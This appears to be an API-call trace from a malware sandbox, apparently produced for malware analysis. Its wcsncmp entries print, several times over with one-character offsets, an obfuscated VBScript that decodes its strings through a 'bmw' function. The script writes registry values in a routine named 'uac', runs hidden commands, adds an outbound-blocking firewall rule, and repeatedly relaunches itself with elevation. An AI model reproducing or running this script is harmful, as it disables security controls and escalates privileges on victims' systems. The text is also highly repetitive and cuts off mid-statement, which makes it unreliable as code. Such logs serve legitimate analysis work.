bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.006] wcsncmp (_String1="abled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0223.006] wcsncmp (_String1="bled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0223.006] wcsncmp (_String1="led = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.006] wcsncmp (_String1="ed = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.006] wcsncmp (_String1="d = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 